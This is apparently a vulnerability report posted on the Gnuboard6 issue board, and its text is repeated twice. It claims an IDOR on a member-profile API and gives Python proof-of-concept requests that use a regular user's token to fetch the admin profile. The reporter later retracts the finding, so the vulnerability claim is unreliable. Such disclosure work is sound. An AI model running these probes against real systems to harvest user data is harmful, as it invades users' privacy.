## Summary
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests
url = "http://localhost:8000/api/v1/token"
credentials = {
"username": "test", # username
"password": "1234"
}
res = requests.post(url, data=credentials)
if res.status_code == 200:
token_data = res.json()
access_token = token_data.get("access_token")
refresh_token = token_data.get("refresh_token")
print("[+] Access Token:", access_token)
print("[+] Refresh Token:", refresh_token)
else:
print(f"[!] 로그인 실패: {res.status_code}")
print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests
access_token = "<access token from step 1>"
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
"Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests
url = "http://localhost:8000/api/v1/token"
credentials = {
"username": "test", # username
"password": "1234"
}
res = requests.post(url, data=credentials)
if res.status_code == 200:
token_data = res.json()
access_token = token_data.get("access_token")
refresh_token = token_data.get("refresh_token")
print("[+] Access Token:", access_token)
print("[+] Refresh Token:", refresh_token)
else:
print(f"[!] 로그인 실패: {res.status_code}")
print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests
access_token = "<access token from step 1>"
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
"Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
댓글 1개
oxqnd
4개월 전
I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.
I apologize for the confusion, and I will close this issue.
게시판 목록
그누보드6 이슈
좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 94 |
kagla
|
1년 전 | 350 | |
| 93 |
supwayb
|
1년 전 | 294 | |
| 92 |
supwayb
|
1년 전 | 344 | |
| 91 |
Junanjunan
|
1년 전 | 262 | |
| 90 |
supwayb
|
1년 전 | 310 | |
| 89 |
supwayb
|
1년 전 | 339 | |
| 88 |
supwayb
|
1년 전 | 314 | |
| 87 |
kagla
|
1년 전 | 225 | |
| 86 |
kagla
|
1년 전 | 253 | |
| 85 |
supwayb
|
1년 전 | 353 | |
| 84 |
supwayb
|
1년 전 | 262 | |
| 83 |
kagla
|
1년 전 | 274 | |
| 82 |
supwayb
|
1년 전 | 323 | |
| 81 |
supwayb
|
1년 전 | 354 | |
| 80 |
seiblog-nandsoft
|
1년 전 | 327 | |
| 79 |
seiblog-nandsoft
|
1년 전 | 259 | |
| 78 |
supwayb
|
1년 전 | 245 | |
| 77 |
supwayb
|
1년 전 | 235 | |
| 76 |
supwayb
|
1년 전 | 255 | |
| 75 |
supwayb
|
1년 전 | 262 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기